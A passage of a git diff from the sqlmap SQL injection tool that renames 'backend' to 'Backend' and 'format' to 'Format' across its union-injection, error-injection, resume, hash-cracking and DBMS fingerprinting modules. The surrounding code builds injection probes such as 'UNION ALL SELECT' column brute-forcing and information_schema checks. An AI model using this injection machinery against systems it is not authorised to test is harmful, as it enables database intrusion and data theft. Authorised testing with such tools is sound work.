- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -158,10 +158,10 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -173,7 +173,7 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -187,12 +187,12 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
elif dump:
if conf.limitStart:
@@ -201,14 +201,14 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
stopLimit = conf.limitStop
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
index 3a0a1fac3..318fd3c64 100644
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -13,7 +13,7 @@ import time
from lib.core.agent import agent
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
@@ -102,14 +102,14 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
for count in range(conf.uColsStart, conf.uColsStop+1):
- if backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
- query = query[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]
+ if Backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
+ query = query[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
if count:
query += ", %s" % conf.uChar
- if backend.getIdentifiedDbms() in FROM_TABLE:
- query += FROM_TABLE[backend.getIdentifiedDbms()]
+ if Backend.getIdentifiedDbms() in FROM_TABLE:
+ query += FROM_TABLE[Backend.getIdentifiedDbms()]
status = "%d/%d" % (count, conf.uColsStop)
debugMsg = "testing %s columns (%d%%)" % (status, round(100.0*count/conf.uColsStop))
diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py
index 5019399d7..24f1b40ce 100644
--- a/lib/techniques/inband/union/use.py
+++ b/lib/techniques/inband/union/use.py
@@ -12,7 +12,7 @@ import time
from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.common import initTechnique
from lib.core.common import isNumPosStrValue
@@ -101,14 +101,14 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
# entry per time
# NOTE: I assume that only queries that get data from a table can
# return multiple entries
- if " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -116,10 +116,10 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -131,7 +131,7 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -145,12 +145,12 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
elif dump:
if conf.limitStart:
@@ -159,14 +159,14 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
stopLimit = conf.limitStop
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = origExpr.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
@@ -214,9 +214,9 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, unpack
try:
for num in xrange(startLimit, stopLimit):
- if backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
field = expressionFieldsList[0]
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
field = expressionFieldsList
else:
field = None
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index cf91748be..32fad04a1 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -22,7 +22,7 @@ from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getCompiledRegex
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getPublicTypeMembers
from lib.core.common import getUnicode
from lib.core.common import paths
@@ -270,9 +270,9 @@ def hashRecognition(value):
if value:
for name, regex in getPublicTypeMembers(HASH):
# Hashes for Oracle and old MySQL look the same hence these checks
- if backend.getIdentifiedDbms() == DBMS.ORACLE and regex == HASH.MYSQL_OLD:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE and regex == HASH.MYSQL_OLD:
continue
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and regex == HASH.ORACLE_OLD:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and regex == HASH.ORACLE_OLD:
continue
elif getCompiledRegex(regex).match(value):
retVal = regex
@@ -454,7 +454,7 @@ def dictionaryAttack(attack_dict):
clearConsoleLine()
if len(hash_regexes) == 0:
- warnMsg = "unknown hash format. "
+ warnMsg = "unknown hash Format. "
warnMsg += "Please report by e-mail to sqlmap-users@lists.sourceforge.net."
logger.warn(warnMsg)
diff --git a/lib/utils/resume.py b/lib/utils/resume.py
index 612647603..099bf457a 100644
--- a/lib/utils/resume.py
+++ b/lib/utils/resume.py
@@ -13,7 +13,7 @@ import time
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import safeStringFormat
from lib.core.common import randomStr
from lib.core.common import replaceNewlineTabs
@@ -35,7 +35,7 @@ def queryOutputLength(expression, payload):
Returns the query output length.
"""
- lengthQuery = queries[backend.getIdentifiedDbms()].length.query
+ lengthQuery = queries[Backend.getIdentifiedDbms()].length.query
select = re.search("\ASELECT\s+", expression, re.I)
selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I)
selectDistinctExpr = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I)
@@ -61,7 +61,7 @@ def queryOutputLength(expression, payload):
if selectDistinctExpr:
lengthExpr = "SELECT %s FROM (%s)" % (lengthQuery % regExpr, expression)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
lengthExpr += " AS %s" % randomStr(lowercase=True)
elif select:
lengthExpr = expression.replace(regExpr, lengthQuery % regExpr, 1)
@@ -146,10 +146,10 @@ def resume(expression, payload):
if not payload:
return None
- if not backend.getIdentifiedDbms():
+ if not Backend.getIdentifiedDbms():
return None
- substringQuery = queries[backend.getIdentifiedDbms()].substring.query
+ substringQuery = queries[Backend.getIdentifiedDbms()].substring.query
select = re.search("\ASELECT ", expression, re.I)
_, length, regExpr = queryOutputLength(expression, payload)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index cb460188b..a006423f9 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getCurrentThreadData
from lib.core.common import randomInt
from lib.core.common import randomStr
@@ -38,9 +38,9 @@ class Fingerprint(GenericFingerprint):
retVal = None
table = None
- if backend.isVersionWithin(("97", "2000")):
+ if Backend.isVersionWithin(("97", "2000")):
table = "MSysAccessObjects"
- elif backend.isVersionWithin(("2002-2003", "2007")):
+ elif Backend.isVersionWithin(("2002-2003", "2007")):
table = "MSysAccessStorage"
if table is not None:
@@ -115,13 +115,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -132,7 +132,7 @@ class Fingerprint(GenericFingerprint):
value += DBMS.ACCESS
return value
- actVer = format.getDbms() + " (%s)" % (self.__sandBoxCheck())
+ actVer = Format.getDbms() + " (%s)" % (self.__sandBoxCheck())
blank = " " * 15
value += "active fingerprint: %s" % actVer
@@ -142,10 +142,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -155,7 +155,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or conf.dbms in ACCESS_ALIASES):
setDbms(DBMS.ACCESS)
return True
@@ -187,7 +187,7 @@ class Fingerprint(GenericFingerprint):
version = self.__sysTablesCheck()
if version is not None:
- backend.setVersion(version)
+ Backend.setVersion(version)
return True
else:
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index 20cef4513..f49d3fc7e 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.common import randomRange
@@ -34,25 +34,25 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
return value
- actVer = format.getDbms() + " (%s)" % (self.__dialectCheck())
+ actVer = Format.getDbms() + " (%s)" % (self.__dialectCheck())
blank = " " * 15
value += "active fingerprint: %s" % actVer
@@ -62,10 +62,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -101,23 +101,23 @@ class Fingerprint(GenericFingerprint):
def __dialectCheck(self):
retVal = None
- if backend.getIdentifiedDbms():
+ if Backend.getIdentifiedDbms():
result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
retVal = "dialect 3" if result else "dialect 1"
return retVal
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(FIREBIRD_ALIASES) \
- or conf.dbms in FIREBIRD_ALIASES) and backend.getVersion() and \
- backend.getVersion() != UNKNOWN_DBMS_VERSION:
- v = backend.getVersion().replace(">", "")
+ if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \
+ or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
- backend.setVersion(v)
+ Backend.setVersion(v)
- setDbms("%s %s" % (DBMS.FIREBIRD, backend.getVersion()))
+ setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion()))
self.getBanner()
@@ -149,7 +149,7 @@ class Fingerprint(GenericFingerprint):
version = self.__sysTablesCheck()
if version is not None:
- backend.setVersion(version)
+ Backend.setVersion(version)
setDbms("%s %s" % (DBMS.FIREBIRD, version))
self.getBanner()
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
index cfbd4348a..6a6ca0035 100644
--- a/plugins/dbms/maxdb/fingerprint.py
+++ b/plugins/dbms/maxdb/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import randomInt
from lib.core.common import randomRange
from lib.core.data import conf
@@ -66,13 +66,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -84,14 +84,14 @@ class Fingerprint(GenericFingerprint):
value += DBMS.MAXDB
return value
- actVer = format.getDbms() + " (%s)" % self.__versionCheck()
+ actVer = Format.getDbms() + " (%s)" % self.__versionCheck()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
value += "\n%sbanner parsing fingerprint: -" % blank
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -99,7 +99,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
setDbms(DBMS.MAXDB)
self.getBanner()
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 460cc6ab6..a6a93044f 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import arrayizeValue
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
@@ -41,7 +41,7 @@ class Enumeration(GenericEnumeration):
infoMsg += " for database '%s'" % conf.db
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].tables
+ rootQuery = queries[Backend.getIdentifiedDbms()].tables
if not conf.db:
if not len(kb.data.cachedDbs):
@@ -111,7 +111,7 @@ class Enumeration(GenericEnumeration):
return kb.data.cachedTables
def searchTable(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_table
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_table
foundTbls = {}
tblList = conf.tbl.split(",")
tblCond = rootQuery.inband.condition
@@ -198,7 +198,7 @@ class Enumeration(GenericEnumeration):
return foundTbls
def searchColumn(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = {}
colList = conf.col.split(",")
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 6894ca14d..551b7e610 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -30,19 +30,19 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -71,10 +71,10 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(MSSQL_ALIASES) \
- or conf.dbms in MSSQL_ALIASES) and backend.getVersion() and \
- backend.getVersion().isdigit():
- setDbms("%s %s" % (DBMS.MSSQL, backend.getVersion()))
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
+ or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion().isdigit():
+ setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
@@ -103,10 +103,10 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression(check)
if result:
- backend.setVersion(version)
+ Backend.setVersion(version)
- if backend.getVersion():
- setDbms("%s %s" % (DBMS.MSSQL, backend.getVersion()))
+ if Backend.getVersion():
+ setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index e9dc91e8f..3e3a93560 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -97,19 +97,19 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
- actVer = format.getDbms()
+ actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
@@ -120,7 +120,7 @@ class Fingerprint(GenericFingerprint):
value += "active fingerprint: %s" % actVer
if comVer:
- comVer = format.getDbms([comVer])
+ comVer = Format.getDbms([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if kb.bannerFp:
@@ -129,10 +129,10 @@ class Fingerprint(GenericFingerprint):
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
- banVer = format.getDbms([banVer] if banVer else None)
+ banVer = Format.getDbms([banVer] if banVer else None)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -150,18 +150,18 @@ class Fingerprint(GenericFingerprint):
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(MYSQL_ALIASES) \
- or conf.dbms in MYSQL_ALIASES) and backend.getVersion() and \
- backend.getVersion() != UNKNOWN_DBMS_VERSION:
- v = backend.getVersion().replace(">", "")
+ if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
+ or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+ v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
- backend.setVersion(v)
+ Backend.setVersion(v)
- setDbms("%s %s" % (DBMS.MYSQL, backend.getVersion()))
+ setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion()))
- if backend.isVersionGreaterOrEqualThan("5"):
+ if Backend.isVersionGreaterOrEqualThan("5"):
kb.data.has_information_schema = True
self.getBanner()
@@ -190,7 +190,7 @@ class Fingerprint(GenericFingerprint):
#if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt)):
if inject.checkBooleanExpression("EXISTS(SELECT %s FROM information_schema.TABLES)" % randInt):
kb.data.has_information_schema = True
- backend.setVersion(">= 5.0.0")
+ Backend.setVersion(">= 5.0.0")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
@@ -202,43 +202,43 @@ class Fingerprint(GenericFingerprint):
# Check if it is MySQL >= 5.5.0
if inject.checkBooleanExpression("TO_SECONDS(950501)>0"):
- backend.setVersion(">= 5.5.0")
+ Backend.setVersion(">= 5.5.0")
# Check if it is MySQL >= 5.1.2 and < 5.5.0
elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"):
if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersionList([">= 5.1.12", "< 5.5.0"])
+ Backend.setVersionList([">= 5.1.12", "< 5.5.0"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt)):
- backend.setVersionList([">= 5.1.7", "< 5.1.12"])
+ Backend.setVersionList([">= 5.1.7", "< 5.1.12"])
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersion("= 5.1.6")
+ Backend.setVersion("= 5.1.6")
elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)):
- backend.setVersionList([">= 5.1.5", "< 5.1.6"])
+ Backend.setVersionList([">= 5.1.5", "< 5.1.6"])
else:
